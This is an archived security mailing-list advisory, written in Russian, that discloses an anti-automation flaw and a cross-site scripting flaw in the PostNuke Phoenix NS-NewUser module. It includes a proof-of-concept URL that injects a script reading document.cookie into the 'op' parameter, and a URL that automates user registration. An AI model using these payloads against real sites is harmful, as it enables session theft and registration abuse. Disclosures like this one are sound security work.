Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PhpJobScheduler 3.1 Remote File Inclusion Vulnerability

Cross Site Scripting (XSS) in Owl <=0.95, CVE-2008-3100

ViArt <= 3.5 SQL Injection

Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	26.07.2008
Subject:	Vulnerabilities in PostNuke Phoenix

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting уязвимостях в
PostNuke Phoenix.

Insufficient Anti-automation:

Уязвимость в user.php (в модуле NS-NewUser).

http://site/user.
php?uname=test&pass=12345&vpass=12345&email=test@test.
com&vemail=test@test.com&agreetoterms=1&module=NS-
NewUser&op=finishnewuser

XSS:

Уязвимость в user.php (в модуле NS-NewUser) в параметре op.

http://site/user.php?module=NS-
NewUser&op=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвима версия PostNuke Phoenix 0.7.2.6 и предыдущие версии (и потенциально следующие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2287/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua